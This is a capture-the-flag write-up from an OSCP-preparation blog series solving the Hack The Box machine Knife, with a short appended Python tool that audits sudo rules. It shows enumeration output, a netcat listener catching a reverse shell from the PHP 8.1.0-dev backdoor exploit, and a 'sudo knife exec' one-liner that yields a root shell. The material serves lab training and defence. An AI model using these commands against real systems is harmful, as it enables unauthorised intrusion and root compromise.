Path to OSCP: Knife

As part of my progress towards achieving Offensive Security Certified Professional certification, I’m attempting to complete all NetSecFocus OSCP-style boxes on Hack The Box, and detailing each box in this “Path to OSCP” blog series.

Next up is Knife. We fire up nmap:

u01@nostromo:~$ nmap -p- -A knife.htb -oA HTB/knife/knife
Starting Nmap 7.94 ( ) at 2023-09-15 14:04 IST
Nmap scan report for knife.htb (
Host is up (0.044s latency).
Not shown: 65533 closed tcp ports (conn-refused)
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Emergent Medical Idea
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 38.17 seconds

The webpage shows the home page of a healthcare company:

All “links” are just plain text. There’s nothing of interest in the page source. We try ffuf and gobuster for directory enumeration with various settings, but can’t find anything of interest.

I kick off a basic Nikto scan to see if it can highlight anything of interest:

u01@nostromo:~$ nikto -host knife.htb
- Nikto v2.5.0
+ Target IP:
+ Target Hostname: knife.htb
+ Target Port: 80
+ Start Time: 2023-09-15 16:24:20 (GMT1)
+ Server: Apache/2.4.41 (Ubuntu)
+ /: Retrieved x-powered-by header: PHP/8.1.0-dev.
+ /: The anti-clickjacking X-Frame-Options header is not present. See:
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See:
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.41 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ 7962 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time: 2023-09-15 16:29:56 (GMT1) (336 seconds)

It shows that PHP 8.1.0-dev is in use. A quick Google of this version brings me to php-8.1.0-dev-backdoor-rce | PHP 8.1.0-dev Backdoor System Shell Script, which details a backdoor for this particular PHP version. “If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agent header”. I clone the repo and, using the reverse shell variant of the exploit, get a reverse shell back to a listening netcat as user james, then retrieve the user.txt flag:

u01@nostromo:/repo/php-8.1.0-dev-backdoor-rce$ python http://knife.htb 7777
u01@nostromo:~$ nc -lvnp 7777
listening on [any] 7777 ...
connect to [] from (UNKNOWN) [] 34682
bash: cannot set terminal process group (1033): Inappropriate ioctl for device
bash: no job control in this shell
james@knife:~$ ls -l ~/user.txt 
ls -l ~/user.txt 
-r-------- 1 james james 33 Sep 15 12:58 /home/james/user.txt

Checking james’ sudo permissions shows that he can run /usr/bin/knife as root without providing a password:

james@knife:~$ sudo -l
sudo -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass,

User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife

“Knife is a command-line tool that provides an interface between a local chef-repo and the Chef Infra Server”. We check old reliable GTFOBins for any privilege escalation path using sudo permissions with knife, and sure enough there’s a straightforward drop to root shell:

We obtain root using this method and can retrieve the root.txt flag:

james@knife:/$ sudo knife exec -E 'exec "/bin/sh"'
sudo knife exec -E 'exec "/bin/sh"'
uid=0(root) gid=0(root) groups=0(root)
ls -l /root/root.txt
-r-------- 1 root root 33 Sep 15 12:58 /root/root.txt
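
As an added defender-side check (not part of the original post), here is a small Python auditor that parses `sudo -l` output in the format shown above and flags rules whose target binary is a documented shell escape; the sample output, and the shell-escape binaries other than knife, are constructed for this example.

```python
import os
import re
from typing import Dict, List

# Illustrative subset of binaries that GTFOBins documents as giving a shell when run via sudo.
# knife is the one confirmed on this box; the rest are an assumption for the example.
SHELL_ESCAPE_BINARIES = {"knife", "vim", "find", "less", "awk", "python3"}

# Constructed sample in the layout sudo -l prints: Defaults lines, then one rule per line.
SAMPLE_SUDO_L = """\
Matching Defaults entries for james on knife:
    env_reset, mail_badpass,

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
    (ALL : ALL) /usr/bin/apt-get
"""

# "(runas[:group]) [TAG: TAG: ...] cmd1, cmd2"
ENTRY_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text: str) -> List[Dict]:
    """Parse the rule lines of `sudo -l` output; Defaults lines are skipped."""
    entries: List[Dict] = []
    in_rules = False
    for raw in text.splitlines():
        line = raw.strip()
        if "may run the following commands" in line:
            in_rules = True          # everything after this header is a rule
            continue
        m = ENTRY_RE.match(line) if in_rules and line else None
        if not m:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        runas = m.group("runas").split(":")[0].strip()   # drop the optional group part
        for cmd in m.group("cmds").split(","):
            entries.append({"runas": runas, "nopasswd": "NOPASSWD" in tags, "command": cmd.strip()})
    return entries


def audit_sudo_l(text: str, risky=SHELL_ESCAPE_BINARIES) -> List[str]:
    """Return one finding per rule whose binary can spawn a shell; NOPASSWD as root is CRITICAL."""
    findings = []
    for e in parse_sudo_l(text):
        binary = os.path.basename(e["command"].split()[0])
        if binary in risky:
            sev = "CRITICAL" if e["runas"] in ("root", "ALL") and e["nopasswd"] else "HIGH"
            findings.append(f"{sev}: ({e['runas']}) {e['command']} allows a shell escape via {binary}")
    return findings
```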

Takeaway for OSCP

This was a very straightforward box, so there is not a huge amount to take away here, other than the useful perspective that an alternative information-gathering tool can give you.
